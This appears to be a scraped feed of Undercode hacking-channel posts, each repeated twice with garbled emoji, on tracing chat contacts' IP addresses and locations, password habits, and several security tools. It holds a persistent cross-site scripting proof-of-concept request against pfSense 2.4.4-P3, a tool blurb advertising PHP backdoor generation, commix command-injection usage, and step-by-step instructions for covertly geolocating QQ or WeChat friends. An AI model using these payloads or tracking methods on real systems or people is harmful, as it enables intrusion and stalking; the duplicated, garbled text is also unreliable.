β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Use the netstat command to quickly find the other party's IP address
> Use the built-in network command netstat in the Windows system to quickly find out the IP address of the friend of the other party. The specific operations are as follows:
fb.com/undercodeTesting
1) Click the <Start> button, execute the <Run> command in the pop-up shortcut menu, the <Run> dialog box pops up, enter the cmd command, and click the <OK> button to open the <Command Prompt> window. (I do nβt want to take screenshots when I turn on the computer lazily)
2) Find a xy friend or WeChat friend, open the chat window with them, and then send a picture to the other party.
3) At this time, enter the netstat -n command in the <Command Prompt> window and execute it. In the running result, you can see which addresses are currently connected to the local computer. If the status of a corresponding connection is ESTABLISHED, it indicates that the connection between the local computer and the opposite computer is successful, and the returned information is as follows.
4) as example after sending,
there are four successful connections. Among them, the host that opens the 80-port service is the QQ server, namely the two IP addresses 106.120.165.244 and 101.199.97.107.
5) Now, open a query website and query the IP address 106.120.165.244. You can see that the information of the other party has been successfully queried. The other IP address is exclusive to Qihoo after query. For example, positioning, recommending whatismyip is a smaller scope
π¦ Attachment: The netstat command is mainly used to display network connection information. It is a very useful tool for monitoring TCP / IP networks. It can let users know which network connections are currently in the system.
1) Enter netstat / in the <Command Prompt> window , You can get help information for this command.
-a or --all: display all connected sockets;
-A <network type> or-<network type>: list related addresses in the connection of this network type;
-c or --continuous: continuously list the network status;
-C or --cache: display the cache information of the router configuration;
-e or --extend: display other related information of the network;
-F or --fib: display FIB;
-g or --groups: display the list of group members with multiple broadcast functions;
-h or --help: online help;
-i or --interfaces: display the web interface information form;
-l or --listening: display the socket of the server under monitoring;
-M or --masquerade: display disguised network connection;
-n or --numeric: use the IP address directly without going through the domain name server;
-N or --netlink or --symbolic: display the symbolic connection name of the network hardware peripheral devices;
-o or --timers: display timer;
-p or --programs: display the program identification code and program name of the socket being used;
-r or --route: display Routing Table;
-s or --statistice: display network work information statistics table;
-t or --tcp: display the connection status of TCP transmission protocol;
-u or --udp: display the connection status of UDP transmission protocol;
-v or --verbose: display the command execution process;
-V or --version: display version information;
-w or --raw: display the connection status of RAW transfer protocol;
-x or --unix: The effect of this parameter is the same as specifying the "-A unix" parameter;
--ip or --inet: The effect of this parameter is the same as specifying the "-A inet" parameter.
2) Know how to lose the above command! ! ! It is netstat -n! ! !
π¦ Also! The command syntax information is as follows:
NETSTAT [-a] [-n] and so on
Do nβt do bad things for fun
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Use the netstat command to quickly find the other party's IP address
> Use the built-in network command netstat in the Windows system to quickly find out the IP address of the friend of the other party. The specific operations are as follows:
fb.com/undercodeTesting
1) Click the <Start> button, execute the <Run> command in the pop-up shortcut menu, the <Run> dialog box pops up, enter the cmd command, and click the <OK> button to open the <Command Prompt> window. (I do nβt want to take screenshots when I turn on the computer lazily)
2) Find a xy friend or WeChat friend, open the chat window with them, and then send a picture to the other party.
3) At this time, enter the netstat -n command in the <Command Prompt> window and execute it. In the running result, you can see which addresses are currently connected to the local computer. If the status of a corresponding connection is ESTABLISHED, it indicates that the connection between the local computer and the opposite computer is successful, and the returned information is as follows.
4) as example after sending,
there are four successful connections. Among them, the host that opens the 80-port service is the QQ server, namely the two IP addresses 106.120.165.244 and 101.199.97.107.
5) Now, open a query website and query the IP address 106.120.165.244. You can see that the information of the other party has been successfully queried. The other IP address is exclusive to Qihoo after query. For example, positioning, recommending whatismyip is a smaller scope
π¦ Attachment: The netstat command is mainly used to display network connection information. It is a very useful tool for monitoring TCP / IP networks. It can let users know which network connections are currently in the system.
1) Enter netstat / in the <Command Prompt> window , You can get help information for this command.
-a or --all: display all connected sockets;
-A <network type> or-<network type>: list related addresses in the connection of this network type;
-c or --continuous: continuously list the network status;
-C or --cache: display the cache information of the router configuration;
-e or --extend: display other related information of the network;
-F or --fib: display FIB;
-g or --groups: display the list of group members with multiple broadcast functions;
-h or --help: online help;
-i or --interfaces: display the web interface information form;
-l or --listening: display the socket of the server under monitoring;
-M or --masquerade: display disguised network connection;
-n or --numeric: use the IP address directly without going through the domain name server;
-N or --netlink or --symbolic: display the symbolic connection name of the network hardware peripheral devices;
-o or --timers: display timer;
-p or --programs: display the program identification code and program name of the socket being used;
-r or --route: display Routing Table;
-s or --statistice: display network work information statistics table;
-t or --tcp: display the connection status of TCP transmission protocol;
-u or --udp: display the connection status of UDP transmission protocol;
-v or --verbose: display the command execution process;
-V or --version: display version information;
-w or --raw: display the connection status of RAW transfer protocol;
-x or --unix: The effect of this parameter is the same as specifying the "-A unix" parameter;
--ip or --inet: The effect of this parameter is the same as specifying the "-A inet" parameter.
2) Know how to lose the above command! ! ! It is netstat -n! ! !
π¦ Also! The command syntax information is as follows:
NETSTAT [-a] [-n] and so on
Do nβt do bad things for fun
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Tracking
> Pseudo-hackers must know skills: query the other party's IP address and determine the true geographic location
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) Preparation:
In order to query the other party's IP address and real geographic location, we need to use the " IP radar " software, which has: query which URLs you have visited, the IP address of its URLs, geographic location and website domain name, as well as access procedures, access Time, the number of bytes transferred, which programs are reading and writing your hard drive and other functions.
> Support system: WinXP / Win2003 / Vista / Win7 / Win8
π¦ Second, the query method:
1) After downloading the "IP Radar", directly decompress it and double-click to run.
2) After turning on the radar, make the "IP radar" in the running monitoring state, and then open the QQ chat window to chat with friends who want to obtain the IP address and real geographic location. Try to send the other party some large file messages such as pictures or music.
3) Then check in the "IP Radar" program, find the column where the "QQ.exe" program is located, and then double-click the column, it will open the "QQ.rxr" program to access the network details.
4) In the pop-up message box, you can find the other party's QQ IP address and geographic location information.
5) If you are afraid that the geographic location provided by "IP Radar" is not accurate enough, you can also directly enter the IP address into the search box of the search engine and click search to find the geographic location of the IP!
6) Get the download address of "IP Radar" , please search for " computer those things " in WeChat to follow our official public account, and reply to " IP Radar " to receive push messages!
Do nβt worry about computer freezes or problems. Pay attention to the WeChat public account of β the computer βs things β (computer system, software application and other problems are all acceptable ) .
> This A simple process by tracking by app, will send more for ip tracking..
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Tracking
> Pseudo-hackers must know skills: query the other party's IP address and determine the true geographic location
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) Preparation:
In order to query the other party's IP address and real geographic location, we need to use the " IP radar " software, which has: query which URLs you have visited, the IP address of its URLs, geographic location and website domain name, as well as access procedures, access Time, the number of bytes transferred, which programs are reading and writing your hard drive and other functions.
> Support system: WinXP / Win2003 / Vista / Win7 / Win8
π¦ Second, the query method:
1) After downloading the "IP Radar", directly decompress it and double-click to run.
2) After turning on the radar, make the "IP radar" in the running monitoring state, and then open the QQ chat window to chat with friends who want to obtain the IP address and real geographic location. Try to send the other party some large file messages such as pictures or music.
3) Then check in the "IP Radar" program, find the column where the "QQ.exe" program is located, and then double-click the column, it will open the "QQ.rxr" program to access the network details.
4) In the pop-up message box, you can find the other party's QQ IP address and geographic location information.
5) If you are afraid that the geographic location provided by "IP Radar" is not accurate enough, you can also directly enter the IP address into the search box of the search engine and click search to find the geographic location of the IP!
6) Get the download address of "IP Radar" , please search for " computer those things " in WeChat to follow our official public account, and reply to " IP Radar " to receive push messages!
Do nβt worry about computer freezes or problems. Pay attention to the WeChat public account of β the computer βs things β (computer system, software application and other problems are all acceptable ) .
> This A simple process by tracking by app, will send more for ip tracking..
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦I have too many account passwords, what should I do? Teach you to set a complex and memorable password
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) The password is set to a universal, easy to remember, but often heard of "crash library" and other cases, breaking the password of a website, all network information is all transparent; password settings are complex and different, for a long time, I forget What password, every time you log in to retrieve the password will waste half a day. The problem of setting a password seems to be simple, but it somewhat troubles our daily life.
2) We do nβt have time to read through cryptography-related professional skills in order to set up a password, and we do nβt want to be easily obtained by those who have misconducted our network information. A simple trick can deal with it. In the process of setting a password, you will find that the combination of letters + numbers + symbols has a high security level, and generally requires 6 digits and more than 8 digits. Then we set the password best to think according to this standard.
π¦ 1) The first step is to think of a set of basic codes. It can be a number, a spelling of a name, or an abbreviation of an aphorism, such as: every day upwards-corresponding to "TTXS" or lowercase "ttxs" or 4463 (stroke for each word),
2) The second step is to add a personality classification based on the basic code. For example, the account number related to finance is defined as: FINA or fa, and the definition of non-financial category is: Game, which can be defined by yourself.
3) The third step is to add tags for each website. For example, today's headline: can be identified as TT (the first letter of the headline)
4) Then combine these into a complex and memorable password rule: personality classification + basic code + website mark (location can be changed at will: basic code + personality classification + website mark ) For example: today βs headline password is OK Set to: fa4463TT (accounts related to finance, the number of strokes every day, the first letter of the headline); the password of Weibo can be set to: Game4463wb (non-financial account, the number of strokes every day, the first of Weibo Abbreviations) We only need to remember our own coding rules.
5) The above method can set up different complex and regular easy-to-remember password series. Don't worry about your password being stolen on a computer or a small book, and don't be afraid that the "crash library" method can easily steal your password, and you don't have to waste time to retrieve the password frequently.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦I have too many account passwords, what should I do? Teach you to set a complex and memorable password
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) The password is set to a universal, easy to remember, but often heard of "crash library" and other cases, breaking the password of a website, all network information is all transparent; password settings are complex and different, for a long time, I forget What password, every time you log in to retrieve the password will waste half a day. The problem of setting a password seems to be simple, but it somewhat troubles our daily life.
2) We do nβt have time to read through cryptography-related professional skills in order to set up a password, and we do nβt want to be easily obtained by those who have misconducted our network information. A simple trick can deal with it. In the process of setting a password, you will find that the combination of letters + numbers + symbols has a high security level, and generally requires 6 digits and more than 8 digits. Then we set the password best to think according to this standard.
π¦ 1) The first step is to think of a set of basic codes. It can be a number, a spelling of a name, or an abbreviation of an aphorism, such as: every day upwards-corresponding to "TTXS" or lowercase "ttxs" or 4463 (stroke for each word),
2) The second step is to add a personality classification based on the basic code. For example, the account number related to finance is defined as: FINA or fa, and the definition of non-financial category is: Game, which can be defined by yourself.
3) The third step is to add tags for each website. For example, today's headline: can be identified as TT (the first letter of the headline)
4) Then combine these into a complex and memorable password rule: personality classification + basic code + website mark (location can be changed at will: basic code + personality classification + website mark ) For example: today βs headline password is OK Set to: fa4463TT (accounts related to finance, the number of strokes every day, the first letter of the headline); the password of Weibo can be set to: Game4463wb (non-financial account, the number of strokes every day, the first of Weibo Abbreviations) We only need to remember our own coding rules.
5) The above method can set up different complex and regular easy-to-remember password series. Don't worry about your password being stolen on a computer or a small book, and don't be afraid that the "crash library" method can easily steal your password, and you don't have to waste time to retrieve the password frequently.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 Verified bug by Undercode
> pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting
t.me/undercodeTesting
# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists within the 'User Manager' functionality of the pfSense administration panel.
# Vulnerable Parameter : descr
# POC
# Exploit Details : The following request will create a user in the 'User Manager' functionality with an XSS payload as the Full Name.
# This payload can be triggered by navigating to "https://TARGET/system_usermanager_addprivs.php?userid=0" where userid is
# the id of the user containing the payload.
POST /system_usermanager.php?act=new HTTP/1.1
Host: TARGET
Connection: close
Content-Length: 410
Cache-Control: max-age=0
Origin: https://TARGET
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Referer: https://TARGET/system_usermanager.php?act=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ebd302521a887cef99f517e3ac6bdd7d
π¦ __csrf_magic=sid%3A3689bbf23a3350994d7543c082fc36d16397208d%2C1585881631&usernamefld=TEST&passwordfld1=password&passwordfld2=password&descr=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&expires=&webguicss=pfSense.css&webguifixedmenu=&webguihostnamemenu=&dashboardcolumns=2&name=&caref=5e643dcfd524e&keylen=2048&lifetime=3650&authorizedkeys=&ipsecpsk=&act=&userid=&privid=&certid=&utype=user&oldusername=&save=Save
π¦Please USE FOR LEARN NOT FOR STEAL Β»
@UNDERCODEOFFICIAL
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 Verified bug by Undercode
> pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting
t.me/undercodeTesting
# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists within the 'User Manager' functionality of the pfSense administration panel.
# Vulnerable Parameter : descr
# POC
# Exploit Details : The following request will create a user in the 'User Manager' functionality with an XSS payload as the Full Name.
# This payload can be triggered by navigating to "https://TARGET/system_usermanager_addprivs.php?userid=0" where userid is
# the id of the user containing the payload.
POST /system_usermanager.php?act=new HTTP/1.1
Host: TARGET
Connection: close
Content-Length: 410
Cache-Control: max-age=0
Origin: https://TARGET
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Referer: https://TARGET/system_usermanager.php?act=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ebd302521a887cef99f517e3ac6bdd7d
π¦ __csrf_magic=sid%3A3689bbf23a3350994d7543c082fc36d16397208d%2C1585881631&usernamefld=TEST&passwordfld1=password&passwordfld2=password&descr=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&expires=&webguicss=pfSense.css&webguifixedmenu=&webguihostnamemenu=&dashboardcolumns=2&name=&caref=5e643dcfd524e&keylen=2048&lifetime=3650&authorizedkeys=&ipsecpsk=&act=&userid=&privid=&certid=&utype=user&oldusername=&save=Save
π¦Please USE FOR LEARN NOT FOR STEAL Β»
@UNDERCODEOFFICIAL
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ A Penetration Testing Framework, Information gathering tool & Website Vulnerability Scanner
instagram.com/undercodeTesting
π¦ ππΌππ πππΈβπ :
Why KillShot ?
You Can use this tool to Spider your website and get important information and gather information automaticaly using whatweb-host-traceroute-dig-fierce-wafw00f or to Identify the cms and to find the vulnerability in your website using Cms Exploit Scanner && WebApp Vul Scanner Also You can use killshot to Scan automaticly multiple type of scan with nmap and unicorn . And With this tool You can Generate PHP Simple Backdoors upload it manual and connect to the target using killshot
π¦πβπππΈπππππΈπππβ & βπβ :
Linux Setup
1) git clone https://github.com/bahaabdelwahed/killshot
2) cd killshot
ruby setup.rb (if setup show any error just try to install the gems/tool manual )
ruby killshot.rb
> Windows Setup
1) Download ruby for windows ==> https://rubyinstaller.org/downloads/
2) Download Cmder here ==> http://cmder.net/
3) Download Curl For 64/32 ==> https://curl.haxx.se/windows/
4) Download nmap ==> https://nmap.org/download.html
Enjoy !
π¦FEATURES :
[0] Nmap Scan
[1] Unicorn Scan
Nmap Scan
[2] Nmap Os Scan
[3] Nmap TCP Scan
[4] Nmap UDB Scan
[5] Nmap All scan
[6] Nmap Http Option Scan
[7] Nmap Live target In Network
Unicorn Scan
[8] Services OS
[9] TCP SYN Scan on a whole network
[01] UDP scan on the whole network
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ A Penetration Testing Framework, Information gathering tool & Website Vulnerability Scanner
instagram.com/undercodeTesting
π¦ ππΌππ πππΈβπ :
Why KillShot ?
You Can use this tool to Spider your website and get important information and gather information automaticaly using whatweb-host-traceroute-dig-fierce-wafw00f or to Identify the cms and to find the vulnerability in your website using Cms Exploit Scanner && WebApp Vul Scanner Also You can use killshot to Scan automaticly multiple type of scan with nmap and unicorn . And With this tool You can Generate PHP Simple Backdoors upload it manual and connect to the target using killshot
π¦πβπππΈπππππΈπππβ & βπβ :
Linux Setup
1) git clone https://github.com/bahaabdelwahed/killshot
2) cd killshot
ruby setup.rb (if setup show any error just try to install the gems/tool manual )
ruby killshot.rb
> Windows Setup
1) Download ruby for windows ==> https://rubyinstaller.org/downloads/
2) Download Cmder here ==> http://cmder.net/
3) Download Curl For 64/32 ==> https://curl.haxx.se/windows/
4) Download nmap ==> https://nmap.org/download.html
Enjoy !
π¦FEATURES :
[0] Nmap Scan
[1] Unicorn Scan
Nmap Scan
[2] Nmap Os Scan
[3] Nmap TCP Scan
[4] Nmap UDB Scan
[5] Nmap All scan
[6] Nmap Http Option Scan
[7] Nmap Live target In Network
Unicorn Scan
[8] Services OS
[9] TCP SYN Scan on a whole network
[01] UDP scan on the whole network
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - bahaabdelwahed/killshot: A Penetration Testing Framework, Information gathering tool & Website Vulnerability Scanner
A Penetration Testing Framework, Information gathering tool & Website Vulnerability Scanner - bahaabdelwahed/killshot
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 - Capstone disassembly/disassembler framework: Core (Arm, Arm64, BPF, EVM, M68K, M680X, MOS65xx, Mips, PPC, RISCV, Sparc, SystemZ, TMS320C64x, Web Assembly, X86, X86_64, XCore) + bindings.
twitter.com/undercodeNews
π¦ FEATURES :
1) Multi-architectures: Arm, Arm64 (Armv8), BPF, Ethereum Virtual Machine, M68K, M680X, Mips, MOS65XX, PowerPC, RISCV, Sparc, SystemZ, TMS320C64X, Web Assembly, XCore & X86 (include X86_64) (details).
2) Clean/simple/lightweight/intuitive architecture-neutral API.
3) Provide details on disassembled instruction (called βdecomposerβ by some others).
4) Provide some semantics of the disassembled instruction, such as list of implicit registers read & written.
5) Implemented in pure C language, with bindings for D, Clojure, F#,
6) Common Lisp, Visual Basic, PHP, PowerShell, Haskell, Perl, Python, Ruby, C#, NodeJS, Java, GO, C++, OCaml, Lua, Rust, Delphi, Free Pascal & Vala available.
7) Native support for Windows & *nix (with Mac OSX, iOS, Android, Linux, *BSD & Solaris confirmed).
8) Thread-safe by design.
9) Special support for embedding into firmware or OS kernel.
10) High performance & suitable for malware analysis (capable of handling various X86 malware tricks).
11) Distributed under the open source BSD license.
π¦πβπππΈπππππΈπππβ & βπβ :
Debian/Ubuntu Linux - core engine
NOTE: At the moment only version 2.1.2 is available in Ubuntu/Debian repositories. Version 3.0.4 will be provided later.
Capstone is available in Ubuntu & Debian Linux (testing/sid flavours). Binary package of the core of Capstone can be installed with:
1) $ sudo apt-get install libcapstone2
To write your own tools with Capstone, install the development package with:
2) $ sudo apt-get install libcapstone-dev
2.2 Mac OSX - core engine
Macport users can install the core of Capstone with:
3(3) $ sudo port install capstone
Note that Macport installs libraries into its own directory, so you need to tell applications where to find them, for example with:
4) $ export DYLD_LIBRARY_PATH=/opt/local/lib/:$DYLD_LIBRARY_PATH
Homebrew users can install the core of Capstone with:
5) $ brew install capstone
Note that Homebrew installs libraries into its own directory, so you need to tell applications where to find them, for example with:
6) $ export DYLD_LIBRARY_PATH=/usr/local/opt/capstone/lib/:$DYLD_LIBRARY_PATH
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 - Capstone disassembly/disassembler framework: Core (Arm, Arm64, BPF, EVM, M68K, M680X, MOS65xx, Mips, PPC, RISCV, Sparc, SystemZ, TMS320C64x, Web Assembly, X86, X86_64, XCore) + bindings.
twitter.com/undercodeNews
π¦ FEATURES :
1) Multi-architectures: Arm, Arm64 (Armv8), BPF, Ethereum Virtual Machine, M68K, M680X, Mips, MOS65XX, PowerPC, RISCV, Sparc, SystemZ, TMS320C64X, Web Assembly, XCore & X86 (include X86_64) (details).
2) Clean/simple/lightweight/intuitive architecture-neutral API.
3) Provide details on disassembled instruction (called βdecomposerβ by some others).
4) Provide some semantics of the disassembled instruction, such as list of implicit registers read & written.
5) Implemented in pure C language, with bindings for D, Clojure, F#,
6) Common Lisp, Visual Basic, PHP, PowerShell, Haskell, Perl, Python, Ruby, C#, NodeJS, Java, GO, C++, OCaml, Lua, Rust, Delphi, Free Pascal & Vala available.
7) Native support for Windows & *nix (with Mac OSX, iOS, Android, Linux, *BSD & Solaris confirmed).
8) Thread-safe by design.
9) Special support for embedding into firmware or OS kernel.
10) High performance & suitable for malware analysis (capable of handling various X86 malware tricks).
11) Distributed under the open source BSD license.
π¦πβπππΈπππππΈπππβ & βπβ :
Debian/Ubuntu Linux - core engine
NOTE: At the moment only version 2.1.2 is available in Ubuntu/Debian repositories. Version 3.0.4 will be provided later.
Capstone is available in Ubuntu & Debian Linux (testing/sid flavours). Binary package of the core of Capstone can be installed with:
1) $ sudo apt-get install libcapstone2
To write your own tools with Capstone, install the development package with:
2) $ sudo apt-get install libcapstone-dev
2.2 Mac OSX - core engine
Macport users can install the core of Capstone with:
3(3) $ sudo port install capstone
Note that Macport installs libraries into its own directory, so you need to tell applications where to find them, for example with:
4) $ export DYLD_LIBRARY_PATH=/opt/local/lib/:$DYLD_LIBRARY_PATH
Homebrew users can install the core of Capstone with:
5) $ brew install capstone
Note that Homebrew installs libraries into its own directory, so you need to tell applications where to find them, for example with:
6) $ export DYLD_LIBRARY_PATH=/usr/local/opt/capstone/lib/:$DYLD_LIBRARY_PATH
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Twitter
UNDERCODE NEWS (@UndercodeNews) | Twitter
The latest Tweets from UNDERCODE NEWS (@UndercodeNews). We provides you daily hacking News & Security Warning & Technologies news & Bugs reports & Analysis... @UndercodeNews @UndercodeUpdate @iUndercode @DailyCve. Aus/Leb
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How to Robots.txt file of a web server and looks at the Disallow entries ?
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) sudo setup.py install
By using pip3
2) sudo apt-get install python3-pip
3) sudo pip3 install parsero
π¦ In Kali Linux
1) sudo apt-get update
2) sudo apt-get install parsero
$ parsero -h
π¦ usage: parsero.py [-h] [-u URL] [-o] [-sb]
optional arguments:
-h, --help show this help message and exit
-u URL Type the URL which will be analyzed
-o Show only the "HTTP 200" status code
-sb Search in Bing indexed Disallows
-f FILE Scan a list of domains from a list
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How to Robots.txt file of a web server and looks at the Disallow entries ?
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) sudo setup.py install
By using pip3
2) sudo apt-get install python3-pip
3) sudo pip3 install parsero
π¦ In Kali Linux
1) sudo apt-get update
2) sudo apt-get install parsero
$ parsero -h
π¦ usage: parsero.py [-h] [-u URL] [-o] [-sb]
optional arguments:
-h, --help show this help message and exit
-u URL Type the URL which will be analyzed
-o Show only the "HTTP 200" status code
-sb Search in Bing indexed Disallows
-f FILE Scan a list of domains from a list
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 Updated Automated All-in-One OS command injection and exploitation tool.
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) git clone https://github.com/commixproject/commix.git
2) To get a list of all options and switches use:
> python commix.py -h
π¦Usage: python commix.py [option(s)]
Options:
-h, --help Show help and exit.
General:
These options relate to general matters.
-v VERBOSE Verbosity level (0-4, Default: 0).
--install Install 'commix' to your system.
--version Show version number and exit.
--update Check for updates (apply if any) and exit.
--output-dir=OUT.. Set custom output directory path.
-s SESSION_FILE Load session from a stored (.sqlite) file.
--flush-session Flush session files for current target.
--ignore-session Ignore results stored in session file.
-t TRAFFIC_FILE Log all HTTP traffic into a textual file.
--batch Never ask for user input, use the default behaviour.
--encoding=ENCOD.. Force character encoding used for data retrieval (e.g.
GBK).
--charset=CHARSET Time-related injection charset (e.g.
"0123456789abcdef")
--check-internet Check internet connection before assessing the target.
Target:
This options has to be provided, to define the target URL.
-u URL, --url=URL Target URL.
--url-reload Reload target URL after command execution.
-l LOGFILE Parse target from HTTP proxy log file.
-m BULKFILE Scan multiple targets given in a textual file.
-r REQUESTFILE Load HTTP request from a file.
--crawl=CRAWLDEPTH Crawl the website starting from the target URL (1-2,
Default: 0).
-x SITEMAP_URL Parse target(s) from remote sitemap(.xml) file.
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 Updated Automated All-in-One OS command injection and exploitation tool.
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) git clone https://github.com/commixproject/commix.git
2) To get a list of all options and switches use:
> python commix.py -h
π¦Usage: python commix.py [option(s)]
Options:
-h, --help Show help and exit.
General:
These options relate to general matters.
-v VERBOSE Verbosity level (0-4, Default: 0).
--install Install 'commix' to your system.
--version Show version number and exit.
--update Check for updates (apply if any) and exit.
--output-dir=OUT.. Set custom output directory path.
-s SESSION_FILE Load session from a stored (.sqlite) file.
--flush-session Flush session files for current target.
--ignore-session Ignore results stored in session file.
-t TRAFFIC_FILE Log all HTTP traffic into a textual file.
--batch Never ask for user input, use the default behaviour.
--encoding=ENCOD.. Force character encoding used for data retrieval (e.g.
GBK).
--charset=CHARSET Time-related injection charset (e.g.
"0123456789abcdef")
--check-internet Check internet connection before assessing the target.
Target:
This options has to be provided, to define the target URL.
-u URL, --url=URL Target URL.
--url-reload Reload target URL after command execution.
-l LOGFILE Parse target from HTTP proxy log file.
-m BULKFILE Scan multiple targets given in a textual file.
-r REQUESTFILE Load HTTP request from a file.
--crawl=CRAWLDEPTH Crawl the website starting from the target URL (1-2,
Default: 0).
-x SITEMAP_URL Parse target(s) from remote sitemap(.xml) file.
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 ADB-Toolkit V2 for easy ADB tricks with many perks in all one tested
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) git clone https://github.com/ASHWIN990/ADB-Toolkit.git
2) cd ADB-Toolkit
3) sudo chmod +x install.sh
4) sudo ./install.sh -i "or" sudo bash install.sh -i
π¦Usage
5) sudo ./ADB-Toolkit.sh
or you can do
6) sudo bash ADB-Toolkit.sh
or you can also do
7) sudo adb-toolkit any where in shell
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 ADB-Toolkit V2 for easy ADB tricks with many perks in all one tested
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) git clone https://github.com/ASHWIN990/ADB-Toolkit.git
2) cd ADB-Toolkit
3) sudo chmod +x install.sh
4) sudo ./install.sh -i "or" sudo bash install.sh -i
π¦Usage
5) sudo ./ADB-Toolkit.sh
or you can do
6) sudo bash ADB-Toolkit.sh
or you can also do
7) sudo adb-toolkit any where in shell
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ To generate a plugin using only the SDK alone, and not a part of the Komand Platform, you can use the following code :
t.me/undercodeTesting
plugin_spec_version: v2
name: example
description: "Example plugin"
version: 1.0.0
## Actions
### Say Goodbye
This action is used to say goodbye to a name.
#### Input
|Name|Type|Default|Required|Description|Enum|
|----|----|-------|--------|-----------|----|
|name|string|None|False|Name to say goodbye to|None|
#### Output
|Name|Type|Required|Description|
|----|----|--------|-----------|
|message|string|False|None|
|time|date|False|None|
### Wave
This action is used to wave a user specified number of times.
#### Input
|Name|Type|Default|Required|Description|Enum|
|----|----|-------|--------|-----------|----|
|count|integer|None|False|None|None|
#### Output
|Name|Type|Required|Description|
|----|----|--------|-----------|
|message|string|False|None|
## Triggers
### Emit Greeting
This trigger is used to triggers a greeting every interval seconds (by default, 15 seconds).
#### Input
|Name|Type|Default|Required|Description|Enum|
|----|----|-------|--------|-----------|----|
|interval|integer|15|False|How often (in seconds) to trigger a greeting|None|
#### Output
|Name|Type|Required|Description|
|----|----|--------|-----------|
|greeting|string|False|None|
|time|date|False|None|
## Connection
The connection configuration accepts the following parameters:
|Name|Type|Default|Required|Description|Enum|
|----|----|-------|--------|-----------|----|
|hostname|string|None|False|None|None|
## Troubleshooting
This plugin does not contain any troubleshooting information.
## Workflows
Examples:
* Testing
## References
* [Komand](https://www.komand.com/)
connection:
hostname:
type: string
triggers:
emit_greeting:
description: "Triggers a greeting every Interval seconds (by default, 15 seconds)"
input:
interval:
type: integer
description: "How often (in seconds) to trigger a greeting"
default: 15
output:
greeting:
type: string
time:
type: date
actions:
wave:
description: "Wave"
input:
count:
type: integer
output:
message:
type: string
say_goodbye:
description: "Say goodbye"
input:
name:
type: string
description: "Name to say goodbye to"
output:
message:
type: string
time:
type: date
π¦ E N J O Y
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ To generate a plugin using only the SDK alone, and not a part of the Komand Platform, you can use the following code :
t.me/undercodeTesting
plugin_spec_version: v2
name: example
description: "Example plugin"
version: 1.0.0
## Actions
### Say Goodbye
